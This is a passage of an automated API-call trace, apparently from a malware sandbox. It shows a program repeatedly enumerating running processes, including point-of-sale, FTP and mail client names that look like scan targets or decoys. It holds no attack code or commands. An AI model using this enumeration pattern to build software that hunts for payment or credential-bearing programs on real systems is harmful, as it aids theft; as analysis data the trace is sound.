| out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0216.496] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0216.498] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0216.501] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0216.503] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0216.506] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0216.509] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0216.511] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.516] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0216.519] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.521] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.523] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0216.526] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.528] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0216.533] CloseHandle (hObject=0x2198) returned 1 [0216.533] Sleep (dwMilliseconds=0x64) [0216.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2138 [0216.810] Process32First (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.813] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.815] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.817] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.819] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.821] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.824] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.826] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.827] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.890] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.892] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.895] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.897] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.899] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.901] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.903] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.906] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.909] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.912] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.914] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.916] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.918] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.921] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.923] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.925] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.954] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.957] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0216.959] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0216.961] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.963] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.966] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.968] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.971] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.973] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.975] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.978] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.981] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.983] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.985] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0216.988] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0216.990] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0217.059] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0217.061] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0217.062] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0217.064] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0217.066] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0217.073] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0217.075] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0217.077] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0217.079] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0217.081] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0217.083] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0217.085] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0217.087] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0217.089] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0217.091] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0217.094] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0217.096] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0217.098] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0217.105] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0217.107] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0217.110] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0217.112] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0217.114] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0217.116] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0217.118] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0217.121] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0217.123] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0217.126] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0217.128] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0217.130] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, 